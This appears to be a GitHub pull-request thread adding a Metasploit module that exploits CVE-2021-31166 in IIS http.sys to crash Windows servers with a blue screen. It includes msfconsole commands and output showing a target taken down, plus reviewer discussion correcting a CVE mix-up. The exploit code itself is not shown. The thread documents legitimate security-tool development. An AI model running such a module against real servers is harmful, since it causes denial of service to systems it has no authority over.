Add CVE-2021-31166 DoS Module

[mauricelambert]

• This module performs a DOS attack using a simple HTTP request
• CVE-2021-31166: HTTP Protocol Stack Remote Code Execution Vulnerability
• Causes a Blue Screen

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/windows/iis/rb_dos_iis_2021_31166
• set RHOST <ip>
• exploit

Output

msf6 > use exploit/windows/iis/rb_dos_iis_2021_31166
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > exploit
[*] Running module against 10.10.10.10

[+] Target is down.
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) >

msf6 > use exploit/windows/iis/rb_dos_iis_2021_31166 
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > set RPORT 80
RPORT => 80
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > set TARGETURI "/test/"
TARGETURI => /test/
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > exploit
[*] Running module against 192.168.56.9

[*] Trying first connection...
[+] First connection OK. Sending payload...
[+] Payload is sent. Check that the server is down...
[-] The connection was refused by the remote host (10.10.10.10:80).
[+] Target is down.
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) >

[gwillcox-r7]

@mauricelambert This appears to be a PoC for CVE-2021-31166, not for CVE-2022-21907 as mentioned at https://isc.sans.edu/diary/28234. In https://isc.sans.edu/diary/28234 we can see the new vuln is related to the trailer feature, not the Accept-Encoding header that CVE-2021-31166 was originally related to.

Therefore I don't think we should be accepting this as a CVE-2022-21907 exploit and I would also question if this has been tested against a machine that has been patched for CVE-2021-31166 but not for CVE-2022-21907. This a common mistake others have made and has lead to much confusion over the last month.

As far as I am aware there has been no public PoC for CVE-2022-21907 however if one did exist it should use the Trailer: header though according to https://isc.sans.edu/diary/28234 the RFC notes that the sender SHOULD generate this header suggesting its not mandatory.

[mauricelambert]

@mauricelambert This appears to be a PoC for CVE-2021-31166, not for CVE-2022-21907 as mentioned at https://isc.sans.edu/diary/28234. In https://isc.sans.edu/diary/28234 we can see the new vuln is related to the trailer feature, not the Accept-Encoding header that CVE-2021-31166 was originally related to.

Therefore I don't think we should be accepting this as a CVE-2022-21907 exploit and I would also question if this has been tested against a machine that has been patched for CVE-2021-31166 but not for CVE-2022-21907. This a common mistake others have made and has lead to much confusion over the last month.

As far as I am aware there has been no public PoC for CVE-2022-21907 however if one did exist it should use the Trailer: header though according to https://isc.sans.edu/diary/28234 the RFC notes that the sender SHOULD generate this header suggesting its not mandatory.

Thanks for the analysis. Indeed you are right my system is not patched, therefore I modified the name of the CVE and the documentation. I will try to mount a system vulnerable to CVE-2022-21907 and try to find a working exploit (I am not a Microsoft/Windows expert, it is unlikely that I will find it).

[github-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[gwillcox-r7]

Suggested change

	```text
	### Windows XXX running IIS XXX with <MONTH> <YEAR> Patches
	```text

[mauricelambert]

I will add the configuration of my Virtual Machine. I print it in the demonstration (gif in the documentation) but gif is too big to be loaded in the markdown.

[gwillcox-r7]

Doesn't look like this was updated @mauricelambert?

[mauricelambert]

Do you want me to add the version and patch like this:

Windows 10 20H2 19042.804 running IIS with November 22, 2021 Patches (KB5007253)

Thanks for commits, i worked on the description but it less detailed than yours.

[gwillcox-r7]

LGTM and tested this successfully. Thanks @mauricelambert! Will land this once tests pass.

[gwillcox-r7]

Release Notes

A new module has been added that exploits CVE-2021-31166, a UAF bug in http.sys when parsing Accept-Encoding headers, to cause a BSoD and denial of service on vulnerable IIS servers.